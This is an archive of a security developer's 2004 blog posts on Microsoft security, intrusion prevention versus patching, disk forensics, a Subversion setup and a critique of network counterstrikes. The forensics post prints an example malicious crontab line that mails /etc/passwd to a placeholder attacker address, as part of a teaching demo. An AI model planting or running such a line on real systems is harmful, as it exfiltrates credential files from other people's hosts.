March 31, 2004

Microsoft Progress Report: Security

Bill Gates fired off one of Microsoft's periodic "Executive E-mail" blasts to customers today, revisiting Microsoft's ongoing security initiatives. In the email he discusses four key areas:

  • Isolation and Resiliency
  • Updating
  • Quality
  • Authentication and Access Control
I will let you judge his views for yourself. Personally, I quite enjoyed reading the email, and I was particularly interested in some of the stats he cited about their new code quality efforts. Here is a quick summary:

  • The number of "critical" or "important" security bulletins issued for Windows Server 2003, compared to Windows 2000 Server, dropped from 40 to 9 in the first 320 days each product was on the market.
  • Similarly, for SQL Server 2000, there were 3 bulletins issued in the 15 months after release of Service Pack 3, compared to 13 bulletins in the 15 months prior to its release.
  • With Exchange 2000 SP3, there was just 1 bulletin in the 21 months after its release, compared to 7 bulletins in the 21 months prior.
Anyways, take some time and go read the email. In the meantime, let's end this entry by quoting Bill:
Technology has come an incredibly long way in the past two decades, and it is far too important to let a few criminals stop the rest of us from enjoying its amazing benefits.

Amen.

Posted by SilverStr at 07:33 PM | Comments (1) | TrackBack

March 29, 2004

Patching vs. Intrusion Prevention

I better start this entry off by stating that for a living (what puts bread on my table) I write computer security tools and technology, with my latest research into mandatory access control driven by providing "process rights management" through host-based intrusion prevention. Ya, it's a mouthful, but basically I have written code that grafts onto the Windows kernel to strengthen the Windows platform by providing application confinement and isolation from the rest of the system. The result is that I can apply the rule of least privilege to resources on a machine and provide safe containment... isolating suspect or even hostile activities before they destroy a system.

The reason I am telling you this is that today I noticed a debate on Network World called "Is patch mgmt. the best protection against vulnerabilities?" in which Shavlik Technologies (for) and Sana Security (against) face off. It's hard to say this without you snickering at me, but I HATE it when two vendors are squared off to make an assessment for the information security profession when both have a stake in their position. (In case you didn't know, Shavlik sells patch management software and Sana sells intrusion prevention software.) Such a debate is typically biased, and slanted towards their products.

Let's get real. The reality is BOTH are right, and BOTH are wrong, for different reasons. Let's look at this from an infosec point of view while understanding the mindset of an administrator responsible for the critical infrastructure of an organization.

Patch management is only effective when actually completed in a timely manner to reduce the threat of exposure from attack. If you look at the most recent trends, most attack vectors are built AFTER a patch is released, as it is much easier for an attacker to disassemble a patch to find the vulnerability(s) in question and create new hostile code to exploit it. The "for" camp in this argument states that application and OS vendors don't always tell you what a patch fixes, which means you need to patch against the unknown. Here is the problem with that argument. How can an administrator of a Fortune 100 company blindly patch a system with code he knows nothing about... especially if you KNOW the vendor isn't telling you everything? He can't. Which is why administrators typically do a staged rollout in a 'clean room' to do regression testing against their existing architecture. And in many cases... the patches do more harm to their systems than good. Meanwhile, the window of exposure stays open, exposing the business to more risk. And the time between patch release and exploit release is shortening as attackers get smarter in their disassembly techniques.

On the other side, the "against" camp states that because customers are not aware of new vulnerabilities they cannot defend against the new exploits... but host-based intrusion prevention software will solve it. There is a catch they don't want to tell you about. Most intrusion prevention systems use a combination of signature-based techniques and whitelist databases to determine access control. The problem with this is that new 0-day attacks don't play by these rules, and they can typically get around such techniques. Moreover, if you use a stringent set of "don't" rules... you end up with an administrative nightmare trying to tune the IPS to work in your environment.

The proof is in how signature-based solutions have failed in other security verticals. Look at antivirus and personal firewalls as an example. The latest CSI/FBI Computer Crime and Security Survey shows that of those organizations that reported breaches in the last 12 months, 98% had firewalls in place, and 99% had antivirus. Yet they were still breached. Does that mean we throw the technology out? No. It just means that these technologies don't work alone, as isolated point solutions. And how much WORSE would the breaches have been WITHOUT the technology in place?

To properly defend ourselves in the digital realm, we need to use a layered defensive posture which includes it all. We should have firewalls, antivirus, network IDS, host-based IPS and patch management. Our decisions have to be part of a BIGGER process in the security management lifecycle. (This is why Schneier says security is a process, not a product.) Remember when I was talking about the 8 rules of Information Security last year? Using a defensive posture like this touches on almost every rule:

  • You need to control change management. (Rule of Change Management) You cannot blindly apply patches; you need to be vigilant and ensure all systems are up to date. A staged rollout is one way to test the change management process and fully understand the implications of the changes.
  • It's not just about applying technology and leaving it alone. (Rule of the Three-Fold Process) You must include monitoring and administration to ensure you keep up to date. Patch management systems are great for this.
  • You must consider everything hostile, and then slowly allow things to happen on your systems. (A combination of the Rule of Least Privilege and the Rule of Trust) Host-based intrusion prevention is perfect for that, when properly tuned and enforced. (See the sketch after this list.)
  • Keeping up with patches ensures that you are strengthening your weakest points at all times. (Rule of Preventative Action)
  • Host-based intrusion prevention not only DETECTS attacks, it can PREVENT them. That's the whole point. As such, you can immediately respond to threats as they occur in a sane manner, using the logs/reports to provide forensic audits of the attack. (The Rule of Immediate and Proper Response) Hell, my IPS system will even go so far as to terminate the attack in mid-execution if it matches certain criteria (defined by the administrator, of course).
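
To make that "consider everything hostile, then slowly allow" idea concrete, here is what a confinement policy might look like. I'll stress that this is a hypothetical, invented syntax for illustration only... it matches no particular product, including mine:

    # Hypothetical default-deny policy for a web server worker process.
    # Anything not explicitly allowed below is treated as hostile and denied.
    process w3wp.exe {
        allow read   C:\Inetpub\wwwroot\*    # serve web content
        allow write  C:\Inetpub\logs\*       # write its own logs
        allow listen tcp/80                  # its only network privilege
        deny  exec   *                       # never spawn child processes
        deny  write  HKLM\*                  # registry stays read-only
    }

A tuned ruleset like this is what keeps an exploited process from doing anything interesting, even when no signature database has ever seen the attack.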

My point here, folks, is that as vendors, we sometimes seem to use FUD or "tainted" messaging to sell our products. Don't buy into it. (And if you ever see my company do it, please email me a stern warning and point me to this entry.) Always consider the bigger picture in your security management lifecycle when evaluating technology. After all... technology is simply an enabler. It's not the solution!

Oh... and if you ARE going to roll out host-based intrusion prevention on Microsoft Windows servers, contact me. I might be able to help you out. :)

Posted by SilverStr at 09:15 AM | TrackBack

March 26, 2004

Network and disk forensics

Earlier this week I was a guest lecturer at BCIT, where I gave my presentation on doing a forensic analysis of a compromised Linux hard drive. I used the same slide deck that I presented at FVLUG and SFU, but did a different live demo, this time showing an attack that inserts an entry into cron to email out the passwd file. Although the slide deck on its own isn't the most useful, for those students that were there, it will be a great help to merge with the notes they took during the demo.
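
For those who weren't at the demo, the planted cron entry looked something like this (the schedule and the attacker's address are placeholders, of course):

    # malicious crontab entry: mails the password file out every morning at 6:05
    5 6 * * * mail attacker@example.com < /etc/passwd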

One of the questions brought up was whether this technique could be used on Windows hard disks. Yes, it can, but you need to use some of the other tools in sleuthkit. As long as you have a valid dd image, you should be ok.
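
As a rough sketch of what that looks like in practice (the device name and the /evidence paths are assumptions... adjust for your own case):

    # image the suspect partition and record a checksum for integrity
    dd if=/dev/hdb1 of=/evidence/disk.dd bs=4096 conv=noerror,sync
    md5sum /evidence/disk.dd > /evidence/disk.dd.md5

    # walk allocated files (fls) and deleted inodes (ils) into mactime's "body" format
    fls -f ntfs -r -m C: /evidence/disk.dd > /evidence/body
    ils -f ntfs -m /evidence/disk.dd >> /evidence/body

    # build a human-readable timeline of file activity
    mactime -b /evidence/body > /evidence/timeline.txt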

While looking for some other NTFS toolkits, I found a new one I had never tried before called FLAG, which stands for "Forensic and Log Analysis GUI". It has some potential for those people who wish to analyze an NTFS system on a Linux forensic machine. There is even a screenshot of FLAG browsing through the registry offline, as well as another one reconstructing jpegs from a dd image on the fly.

When I have some time I am going to see about cranking out something similar in .NET for Windows. FLAG looks kewl, but to be honest I would like to see something like this for information security professionals who use Windows but cannot afford tools like EnCase, Forensic Toolkit or iLook, or a dedicated forensics machine like those from DIBS USA or Digital Intelligence.

Course, I rarely have that kind of time, so that might not get very far. Maybe if I just ported grave-robber, ils, ils2mac and mactime, that would go a long way toward letting people do this work on Windows. Who knows.

Anyways, if you've got a few moments and are into digital forensics, give FLAG a try. You can get the Knoppix-enabled ISO here (MD5 checksum) from the Australian Department of Defence.

Posted by SilverStr at 10:24 AM | TrackBack

Arcterex... you rock!

There is a saying out there that goes something like "a friend won't tell when you kill someone... but a really good friend will help you bury the body". I just wanted to thank Alan for helping me 'bury a body', so to speak, tonight.

At 11:30 at night I drove out to his place, and in less than an hour we completely swapped out a motherboard, rebuilt a kernel and got one of my servers back up and running for an install at the ISP tomorrow. The result? A faster machine I am actually comfortable with taking to the ISP. No video problems. Lots of RAM that is properly recognized. Hard drives running at peak effectiveness. And the kicker... a BIOS that properly handles power management. (Don't ask... it's a LONG story)

Anyways... thanks Alan. You rock!

Posted by SilverStr at 01:32 AM | Comments (1) | TrackBack

March 25, 2004

Trip down memory lane

Alan was going through some old home dirs on one of his servers, when he came across an old account of mine from back in 1999.

After being told to stroll down memory lane, I did... and OMG, I had forgotten what my desktops used to look like.

Anyways, for your amusement, here are the screenshots I took of my desktop back in 1999.

The first one was my main development machine back then, and the second one was my laptop, which I still use today for some forensics work. (It's only got a 486 capable of 800x600, so it pretty much sucks for anything except console work)

So, got any interesting shots from back before the turn of the century for me to see?

Posted by SilverStr at 11:34 AM | Comments (10) | TrackBack

March 24, 2004

Proactive sales in a small ISV

Eric has posted a great MSDN article on the function of proactive sales in a small ISV.

I love reading his insights on this sort of thing. As the owner of a small ISV myself, I completely understand and relate to his writings. This article is no different. Wrestling with the question of when, and if, to get a sales guy is important, and understanding a sales guy's traits is quite difficult. He answers this question quite well.

Good job Eric.

Posted by SilverStr at 09:32 PM | TrackBack

Analysis of the Exploitation Processes

Steven Hill (aka "SolarIce") from Covert Systems Research has released a paper on gaining horizontal or vertical escalation of privileges through the exploitation of particular vulnerabilities in processes.

Discussing things like stack, heap and function pointer overwrites, as well as format string vulnerabilities, it's worth reading if you want to see how it is technically done.

You should have a pretty good grasp of gcc and gdb if you want to really understand what is going on. All in all though, it's a pretty good read... although Steven admits it's far from being a complete work on the subject.

Happy reading.

Posted by SilverStr at 08:02 AM | TrackBack

March 22, 2004

IT Security at Microsoft

Microsoft has released a great slide deck and Word document discussing what the Microsoft Corporate Security group does to prevent malicious or unauthorized use of digital assets at Microsoft.

It is very interesting to see how their asset protection takes place through a formal risk management framework, risk management processes, and clear organizational roles and responsibilities. The basis of the approach is recognition that risk is an inherent part of any environment and that risk should be proactively managed. They say that the principles and techniques described can be employed to manage risk at any organization.

It's well worth your time to see how they present the information. Although this is not really "new" information, it's interesting to see Microsoft so open about it. And man... their slide decks sure are looking much better nowadays.

Enjoy.

Posted by SilverStr at 09:17 PM | Comments (2) | TrackBack

Handbook of Information Security Management

The CISSP Open Study Guides Web Site, in collaboration with Auerbach, has released the content of the book "Handbook of Information Security Management" online.

Personally I prefer to read books in analog (ie: paper) form, since it's much more comfortable, but if you are into reading an entire book online, check it out.

Of course, this does give me more incentive to rethink the idea of getting a TabletPC... :)

Posted by SilverStr at 12:02 AM | TrackBack

March 21, 2004

Windows XP Service Pack 2 Preview available for download

Microsoft has released a technical preview of Windows XP Service Pack 2 (XPSP2) that you can now download from the Internet.

I have been running a version earlier than RC1 and it has been pretty stable, but that has been in an isolated environment which is pretty clean. I have not yet moved this to any of my production systems, and don't intend to just yet.

If you are curious about looking at XPSP2RC1 (holy acronym, Batman), this preview will aid you in planning and testing for the deployment of Windows XP SP2 later this year.

Feel free to download it now and give it a try in VMWare, VirtualPC or an isolated machine.

Posted by SilverStr at 11:54 PM | TrackBack

March 18, 2004

Techniques for Securing Private Objects in Your Applications

Have you ever wanted to know how you can extend the Windows operating system's rich security features to your own applications? Well, there is an interesting article that was published on MSDN this morning that explains just how to do that.

It is focused more on C++, but is quite useful to all programmers. It provides a good introduction to understanding the difference between things like tokens, security descriptors and ACLs, and the author aimed to make security programming practical and approachable with this article.

If you are doing any sort of coding on Windows and care about securing your objects, I suggest you read this.

Enjoy.

Posted by SilverStr at 10:12 AM | TrackBack

Quality software means more secure software

I found a great article/interview on ComputerWorld with Gary McGraw, discussing hacker exploits and the state of software quality.

I just can't wait to get Gary's book. If his writing style is anything like his interview style, it should be really good.

Anyways, if you are into learning Gary's take on building more secure software by writing better quality software, consider reading the interview.

Posted by SilverStr at 12:03 AM | Comments (1) | TrackBack

March 16, 2004

Microsoft releases new tool to monitor network ports

Microsoft has released a new tool today called Port Reporter (PortRptr.exe) that will log TCP and UDP port activity on a local Windows system.

On Windows XP and Windows Server 2003 this service is able to log which ports are used, which process is using the port, if the process is a service, which modules the process has loaded and which user account is running the process.

On Windows 2000 systems, this service is limited to logging which ports are used and when. In both cases the information that the service provides can be helpful for security purposes, troubleshooting scenarios, and profiling systems’ port usage.

This is a small but really useful tool that runs as a service. I suggest you download it and give it a try if you are curious about the ports open on your machine(s).
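
If you just want a quick one-off look at the same kind of data without installing a service, the tools built into Windows XP and 2003 get you part of the way there (the PID below is just an example):

    netstat -ano                        (every TCP/UDP port, with the owning process ID)
    tasklist /svc /fi "PID eq 1234"     (maps that PID back to a process and any services it hosts)

Port Reporter's advantage is that it logs all of this over time, which is what you really want when profiling a system.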

Posted by SilverStr at 11:27 AM | Comments (4) | TrackBack

Neat Windows Shell Trick to Launch CMD Window

Today I learned a neat little shell trick thanks to my buddy Gareth.

Have you ever been browsing in Explorer and wanted to drop down to a CMD window at that point? Not easy. You can open a cmd window, drag the path from Explorer into the cmd window as a drop target and then go from there. But he showed me a neat registry hack to make it a right-click menu option!

Steps to add this:

  1. Start regedit
  2. Open HKEY_CLASSES_ROOT\Directory\shell
  3. Add a new key called 'cmd' (without the quotes)
  4. Edit the (Default) string and name it whatever you want the menu item to say. I put 'Open CMD here'
  5. Add a subkey called 'command' (without the quotes)
  6. Edit the (Default) string and add the following: cmd.exe /k "cd %L"

Now if you right-click on a folder, you will have an 'Open CMD here' option which opens the cmd prompt right at that location!
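
If you'd rather not click through regedit, the same steps collapse into a .reg file you can merge with a double-click (usual disclaimer applies: back up your registry first):

    Windows Registry Editor Version 5.00

    [HKEY_CLASSES_ROOT\Directory\shell\cmd]
    @="Open CMD here"

    [HKEY_CLASSES_ROOT\Directory\shell\cmd\command]
    @="cmd.exe /k \"cd %L\""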

Easy hack... really nice result.

Posted by SilverStr at 10:03 AM | Comments (4) | TrackBack

March 15, 2004

Trustworthy Messaging at Microsoft

Microsoft has published some information about their internal need for trustworthy messaging, and how they solved it.

Microsoft needed to use email for transmitting business-sensitive data but was concerned about security and data privacy. Their internal IT group deployed a solution they called trustworthy messaging, offering both senders and recipients three levels of protection for their data. These protections are based on applying Secure Multipurpose Internet Mail Extensions (S/MIME) digital signatures, S/MIME encryption, and/or rights management policies.

Anyways, if you are interested, Microsoft has released a small slide deck (not that useful) and a Word document (much better than the slide deck) that give a glimpse into their thought process on the topic.

Enjoy.

Posted by SilverStr at 01:21 PM | TrackBack

March 14, 2004

Subversion + TortoiseSVN = AWESOME SCM solution

Ok, so belay my last message about running Subversion alongside CVS. I don't need to. Subversion is working PERFECTLY.

I spent yesterday setting things up... and all I can say is OMG. I have never been so impressed with how quickly everything snapped together as it relates to developer tools.

TortoiseSVN has made all the difference. It is just amazing. It has such slick integration directly into Explorer it's not even funny. Here is a screenshot of one of my C# code trees checked out of my Subversion repository:

With shell extensions turned on, it gives an awesome icon overlay to immediately tell me if a file is out of sync, needs to be checked in, etc. As you can see in that shot, Dacl.cs has been altered and needs to be checked in. A simple right-click on it and hitting "Commit" will do that. Or I could step out a directory or two, and it will recursively find which files need to be checked in, and do it for me.
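
For the command-line inclined, the equivalent is just as terse (the commit message is obviously just an example):

    svn status                                  (flags Dacl.cs as M for modified)
    svn commit -m "Fixed DACL handling" Dacl.cs (checks in just that file)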

It uses SSH2 and tunnels nice and cleanly through just about everything. The only issue I still need to resolve is how to get the client to use my ssh keys so I don't have to enter my password on every action. It seems to prompt me twice each time I take an action, and that's a bit annoying at times. Apparently it's just a config option to get the TortoiseSVNPlink ssh agent to work... I just haven't gotten around to figuring that out yet.

The Tortoise Merge and Diff utils work great. I already used them last night to do some compares, and they "just worked" for me. I like it when I don't have to think and a tool does exactly what it is supposed to do without me having to fuss with it.

I am running Subversion in standalone server mode, and NOT through Apache. I prefer to use the rule of separation for such tasks, and I was able to do that nicely, configuring it to run as an unprivileged user with no access to anything except the source code repo. Here are the steps I took to basically get things going on the Linux side of things (using Debian as my base):

  1. apt-get install subversion
  2. adduser svn
  3. mkdir /var/svn
  4. svnadmin create /var/svn (Creates the initial repository. I spent more time figuring out how to do that than anything else)
  5. chown -R svn.devteam /var/svn (devteam is my corporate developer group on the server)
  6. chmod 775 /var/svn
  7. cd /var/svn
  8. chmod g+w db (group needs write access to the repo)
  9. chmod g+w locks (group needs write access to the file locks)
  10. cd db
  11. chmod 440 * (no one outside of svn and the dev team should be touching these files anyways)
  12. cd ../locks
  13. chmod 440 * (no one outside of svn and the dev team should be touching these files anyways)
  14. su svn
  15. crontab -e
  16. When in crontab add this: @reboot svnserve -t -r /var/svn
  17. :x (or whatever your save and exit key sequence is)
  18. svnserve -t -r /var/svn (Need to start it for the first time, since it would seem silly to reboot at this point)
  19. exit
  20. vi /etc/passwd and change the shell from /bin/bash to /bin/false for the svn user

That's it. At that point I have Subversion running as user svn, with the local repo stored in /var/svn, accessible via SSH tunneling for the development group.

To access it with TortoiseSVN I just do a checkout via a right-click and then type: svn+ssh://dana@vulscan.com/ProjectTakeOverTheWorld/ and go to town coding my Pinky and the Brain Mind Altering Operating System. (Better known as PATBMAOS, or Longhorn for short)
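
The command-line client speaks the same URL, which also makes for a quick smoke test that svnserve and the SSH tunnel are healthy:

    svn list svn+ssh://dana@vulscan.com/ProjectTakeOverTheWorld/        (browse the tree remotely)
    svn checkout svn+ssh://dana@vulscan.com/ProjectTakeOverTheWorld/    (pull down a working copy)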

I still have to get used to how Subversion works, and I could have done a better job by reading their docs BEFORE importing all my code. I wish I had known to use their format of repository/project/trunk, repository/project/branches and repository/project/tags for the directory structure. I'm not sure how that will muck up my branches and tags. Will have to wait and see.
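
If it does, the fix looks recoverable, since copies and moves are cheap, server-side operations in Subversion, so the layout can be retrofitted after the fact. A sketch of what I have in mind (the src directory is just an illustration):

    # create the conventional layout inside the project (each URL operation commits immediately)
    svn mkdir -m "Add standard layout" \
        svn+ssh://dana@vulscan.com/ProjectTakeOverTheWorld/trunk \
        svn+ssh://dana@vulscan.com/ProjectTakeOverTheWorld/branches \
        svn+ssh://dana@vulscan.com/ProjectTakeOverTheWorld/tags

    # then sweep the existing code into trunk with a server-side move
    svn move -m "Move source into trunk" \
        svn+ssh://dana@vulscan.com/ProjectTakeOverTheWorld/src \
        svn+ssh://dana@vulscan.com/ProjectTakeOverTheWorld/trunk/src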

So, end result? I would sum it up as:

  • I have a completely integrated SCM solution working on my Windows dev machine that...
  • ... has its client completely integrated into Explorer,
  • ... with the server working on our existing Linux architecture with very little resource overhead,
  • ... which tunnels over SSH,
  • ... works similar to CVS,
  • ... but doesn't leave file crud in my master sources like CVS,
  • ... can be easily sandboxed and does NOT require external servers (ie: web servers, although it can use one if you want)
  • ... was extremely easy to learn to use, with almost no learning curve past normal SCM operations
  • ... cost me NOTHING for the software, and implementation costs were less than an hour
If you look back at my original requirements, it met every need except for direct access from within Visual Studio. And I am ok with that. To be honest, I am HAPPIER with it working directly in Explorer. Since most of my code is driven through kernel-mode development using the DDK, I would have had to use the client outside of Visual Studio most of the time anyways. By using the same Explorer window for both my VS-based code and my DDK-based code, I have a seamless and identical process for any code I work on.

So there you have it. Subversion + TortoiseSVN = My SCM solution. And I am quite happy with how it turned out.

Posted by SilverStr at 09:05 AM | Comments (5) | TrackBack

March 13, 2004

Sorry Microsoft, but Outlook 2003 doesn't make the cut

I'm sorry, but Outlook 2003 is just not the productivity application Microsoft wants you to believe it is. I know Robert says it's his godsend for productivity, but after using it now for over a month and a half, I have to agree with Chris and nuke it. I just can't stand how it STOPS my productivity. I even tried asking for help earlier on my blog, and got a few concerned emails from people... but no one had a clue how to diagnose and fix this. And I just can't put up with it any longer.

I was looking SO forward to using Outlook 2003 with Business Contact Manager it wasn't funny. I tried EVERYTHING I could think of to get it to work for my needs, but it's just impossible. Let me explain why it sucks so badly...

IMAP over SSL polling freezes. It actually HANGS Outlook 2003 on me, preventing me from reading email in other folders while it's checking for mail. I can't even flip over to my calendar while a polling event is occurring... it's just that badly designed. Compound that with the fact that Outlook is polling for me every 2 minutes... and it basically means that Outlook is hung MOST of the time.

This is a sad state when an app of Outlook's sophistication can't even handle multithreading between views, folders or even messages. What is WORSE here is that Microsoft KNOWS about this! In Microsoft Knowledge Base Article 826807 they say... and I quote: "When you work with an e-mail message on an Internet Message Access Protocol (IMAP) server, no other action in Microsoft Outlook occurs until the current action that is being processed is finished. If you do not want to wait for the process to complete, the only way to stop the process is to force Outlook to shutdown in Windows Task Manager." They go on to say it could be a latency issue (not likely... it's on a 100Mb backbone with the server six feet away), which leaves me shuddering in fear any time it tries to get mail.

If you put your tinfoil hat on for a moment, you start wondering if this is on purpose. This doesn't happen against Exchange servers. And the IMAP polling in Outlook Express works fine. Funny how that works, isn't it? It's just got to be a conspiracy to covertly get people to move to Exchange. *sigh* Ok, maybe not... but I can't fathom why mail polling is this poorly designed for IMAP in Outlook, but works fine in Outlook Express.

So in the interim, I have installed Thunderbird and am giving that a try for mail. Works great. Super fast, no hanging, and I can read messages while it's downloading others, etc.

Now I just have to find a separate app that will handle my calendar (Mozilla Calendar sucks), contacts and business contact management (perhaps I will look at GoldMine or Act again), and sync it all to my Handspring Prism.

You lost a customer today, Microsoft. I wanted so badly to have my desktop running purely the latest and greatest from Microsoft on a daily basis. But when I can't even check my mail without Outlook freezing, it's time to move on. Hell, even Pine or mutt would be better than Outlook 2003. And that's saying a lot.

Posted by SilverStr at 03:50 PM | Comments (3) | TrackBack

March 12, 2004

Update on my Source Control Trials

Well, if you recall, a while back I put a call out about SCM solutions, as I wanted to get away from my combination of command-line cvs + ssh + cygwin for source control management.

Since that time, I have reviewed several solutions and still haven't come to a system I am completely happy with. They all have pieces that I like, and most have things that I DON'T like.

Right now I am leaning towards the use of Subversion with TortoiseSVN Windows shell extensions. Let me explain why this solution might work for me:

  • Has all the things I liked in CVS
  • Fixes most of the stuff I don't like about CVS. ie: Directories, renames and file metadata are versioned, and there is support for atomic checkins and better branching
  • Speaking of branching, there is now no extra "cost" in doing so. There is no expensive overhead as there is in CVS. It deals with tags WAY differently.
  • Handles binaries just like text files. YAHOO!! (*My number one beef with CVS, besides CVS throwing garbage in every one of my directories*)
  • TortoiseSVN seems easy to use and actually looks nice. No cumbersome, complex, ugly-looking UI to make the entire process more complex than it needs to be
  • Subversion server works on my existing Linux machines
  • No reliance on a web server to run (but can use Apache with WebDAV)
  • Cost. It's free!

If it weren't for finding TortoiseSVN, I would probably have gone with Perforce. Perforce also works on my Linux servers, and the UI seemed decent enough. I will let you know how it goes as I begin to actually use the new system on a daily basis concurrently with my existing solution. Hopefully within a month or two I will phase out cvs through cygwin and exclusively run TortoiseSVN with Subversion.

I'll let you know how it goes.

Posted by SilverStr at 03:21 PM | TrackBack

March 11, 2004

Application Security Best Practices at Microsoft

Microsoft has released a slide deck and white paper on their Application Security Assurance Program.

Microsoft founded the Application Security Assurance Program (ASAP) to inventory, assess, and—when necessary—ensure resolution of security vulnerability issues found in line-of-business applications. Topics include the program's criteria for assessing applications, the participants in the review process, the requirements for a secure application environment, lessons learned while evaluating applications at Microsoft, and best practices for enhancing the security of applications in development.

Posted by SilverStr at 01:10 AM | TrackBack

March 10, 2004

Rules of Engagement for Information Warfare

Symbiot Security contends that on March 31st of this year, the rules for information warfare are going to change.

Mike Erwin, Symbiot's president, and Paco Nathan, its chief scientist, have released a whitepaper entitled "On the Rules of Engagement for Information Warfare" which details the idea that best practices for information security in the private sector have focused only on defense, and need to look at offense to provide a complete defense.

Drawing on the lawful military doctrine of necessity and proportionality, they believe that as infosec professionals we have the right to counterstrike hostile intent with the subsequent use of force in self-defense.

In other words, when hostile intent such as a DoS flood begins to attack you, they believe that you have the right to attack back through an escalation of response. (Think DEFCON for the Internet) Although this may seem like immediate and proper response to some, it is flawed. Let me explain why.

In the physical world, history has shown that the necessity and proportionality of response has been riddled with erroneous decisions which have potentially done more damage than good. Escalating DEFCON levels brought our world to the brink of nuclear war on various occasions during the cold war because of such actions. Rules, roles and responsibilities have kept intelligence agencies in check as they balance response against GOOD intelligence... sifting out potentially covert actions by third parties and building a complete threat analysis before attacking. Even this fails... as we have seen in the case of the erroneous intelligence that triggered the US to invade Iraq. (I will sidestep the political minefield here and assume for a moment that the President of the United States acted in good faith... we can deal with conspiracy theories later.)

Now let's come back from that tangent and reflect on such actions in the digital world. The underlying protocols that run the Internet were never designed to deal with non-repudiation, nor were they ever designed to guarantee upper-layer authenticity. In other words, it is quite easy to spoof a target at every layer of the OSI stack, providing multiple attack vectors into any data stream. Based on the probable level of threat, they believe the use of a scale of force to block hostile acts, or to degrade network quality of service for indeterminate acts, can be the first step in analysis of the target... allowing for reflection before a final "return fire" action to counterstrike the hostile source.

In my opinion the idea is noble, but the implementation is flawed. The use of such escalation tactics with such aggressive counterstrike capabilities in cyberspace carries the added risk of failure in automated determination, which will allow attackers to more easily launch strikes covertly against their real intended targets. There is a REASON why in the physical world there is a need for two separate keys and an authenticated launch code for nuclear weapons on submarines. It is to prevent such actions. No such safeguards have been proposed for even the first stage of hostile source analysis. The moment you respond to a threat by degrading any sort of service past your own ownership boundaries, you are breaching the remote host's network, making you no better than the hostile source.

Let me see if I can clear that up. In many cases attacks are launched by zombie platforms: "owned" remote machines allowing the attacker to mask not only their original location, but also their original intent. It is not uncommon for an attack vector to come through vulnerable and exploited systems that reside on home computers or unpatched remote desktops like those used by roaming users. But here is the problem. Both ends go through networks YOU don't own. When you counterstrike "grandma's computer", you are also affecting grandma's ISP. And all routes in between. You are now part of the problem, not part of the solution.

But it gets worse. What happens if both endpoint providers use a scale of force to engage in defense/counter-defense? Arming procedures for the escalation of response could go from non-destructive to destructive and non-recoverable actions in mere moments. Without human response... or with the human response of those in an operation center who truly don't know what threats they are really susceptible to.

The idea is noble, and I too would like to attack the bastards that attack me. However, you cannot guarantee that the proper target is 'in your sights'. From the brief whitepaper it seems that they believe human interaction is required in the operation center to analyze and escalate response. This would HAVE to be essential... because if you automate it... you will be building the biggest 'cyberweapon' launch pad the Internet has ever seen.

Yet the weakest link in security is the human factor. Checks and balances have to be in place to ensure that there is no misconfiguration... or hostile intent by the person(s) working with the system. The last thing you need is a person who escalates a response against his 'former employer' in a retaliatory strike. Who is going to monitor the monitors? This is a vicious circle.

I don't think it's fair of me to criticize Symbiot's ideas blindly without providing alternatives. To be honest, I don't believe I can properly respond to their rules until I understand them better... which won't be until after March 31st. Until then, we can only speculate on how they intend to do it. For me... this counterstrike approach is ethically wrong. (And in many jurisdictions legally wrong as well.) There is no evidence that this is a more effective way to deal with the current threats we are exposed to, and there is quite a bit of historical precedent that indicates it is totally counterproductive. On top of that, it's exactly this type of "whitehat" tool which would be turned around and used by the "blackhat" community as another attack platform. The last thing we need is another commercial product that is specifically designed to attack other systems.

But... that is just my opinion. And I am biased. I write digital defensive tools for a living. You would think I would welcome this... since it would increase my business *lol* But I don't.

And nor should you.

Posted by SilverStr at 10:36 AM | Comments (1) | TrackBack

March 08, 2004

Exploiting Software: How to Break Code

Sorry for the lack of posts. Quite swamped here lately with some of my own work.

Stuck my head out for a bit and saw an interesting post from Gary about the fact that one of the sample chapters from his book (Exploiting Software: How to Break Code) is online for your reading pleasure.

I took a quick read through the chapter over lunch, and I must say it looks REALLY good. I am going to need to add it to my list of books to pick up on my next reading frenzy. I am actually heading out in a couple of weeks to relax on a nice secluded island away from computers for a few days... and I might just take Gary's book with me (assuming I get it in time, of course).

Anyways, you can head over to Amazon to order your copy today! Let me know what you think of it if you read it in the next week or so, just in case my expectations are too high. (I doubt it, Gary is a kewl guy)

Now to wrestle with a big dilemma... do I order and read Security Warrior first, or Exploiting Software: How to Break Code?

What do you think?

Posted by SilverStr at 06:17 PM | Comments (8) | TrackBack

March 04, 2004

Interesting research on application security metrics

Chris sent a good post to SC-L yesterday about some research @stake did on application security metrics. Although the findings are mostly focused on web application security, it's still quite interesting, especially since this was completed before OWASP really took off. I thought I would post it here because I know I am going to reference its findings in the future.


@stake published its first application security metrics report in April 2002.
It is an analysis of 45 "e-business" applications that @stake assessed for its
clients. Most are web applications.

The Security of Applications: Not All Are Created Equal
http://www.atstake.com/research/reports/acrobat/atstake_app_unequal.pdf

@stake found that 70% of the defects analyzed were design flaws that could
have been found using threat modelling and secure design reviews before the
implementation stage of development.

62% of the apps allowed access controls to be bypassed, 27% had no
prevention of brute force attacks against passwords, and 71% had poor
input validation.

@stake lists the top 10 categories of application defects found. The list
predates the OWASP Top 10 by eleven months and is largely the same.
The data has the percentage of applications affected and is ranked, so it is not
anecdotal.

This is a follow-up to the first application defect study, done 15 months later
in July 2003 to see if application security is improving.

The Security of Applications, Reloaded
http://www.atstake.com/research/reports/acrobat/atstake_app_reloaded.pdf

The results found that security is improving overall but that there is a widening
gap between the security quality of the top quartile of applications and the
bottom quartile.

There is another article that 3 @stake authors wrote for IEEE Security and
Privacy Magazine which contains elements from both reports.

Information Security: Why the Future Belongs to the Quants
http://www.atstake.com/research/reports/acrobat/ieee_quant.pdf

Cheers,
Chris

Thanks Chris! Good information here.

Posted by SilverStr at 12:26 PM | TrackBack

Chuckle for the day

Ken pointed out a really interesting comic strip by FoxTrot on the SecureCoding mailing list today:

Ya, I chuckled too.

Posted by SilverStr at 12:18 PM | Comments (2) | TrackBack

March 02, 2004

Microsoft Security Guidance Kit CD v1.0

I noticed a link on Microsoft's Security Guidance Center where you can pre-order the Microsoft Security Guidance Kit CD v1.0.

The CD-ROM contains tools, templates, roadmaps and how-to guides in addition to Microsoft's prescriptive security guidance. The kit is designed to help you implement measures like automating security patch installation and blocking unsafe email attachments to help your organization stay protected.

There is no cost for the CD, and Microsoft is covering the shipping too! I already ordered mine, and I suggest you do the same.

Posted by SilverStr at 10:16 AM | Comments (4) | TrackBack

March 01, 2004

A friendlier NSA for your Kids!

Well, it seems the NSA has gone and redone their website. It actually looks pretty good.

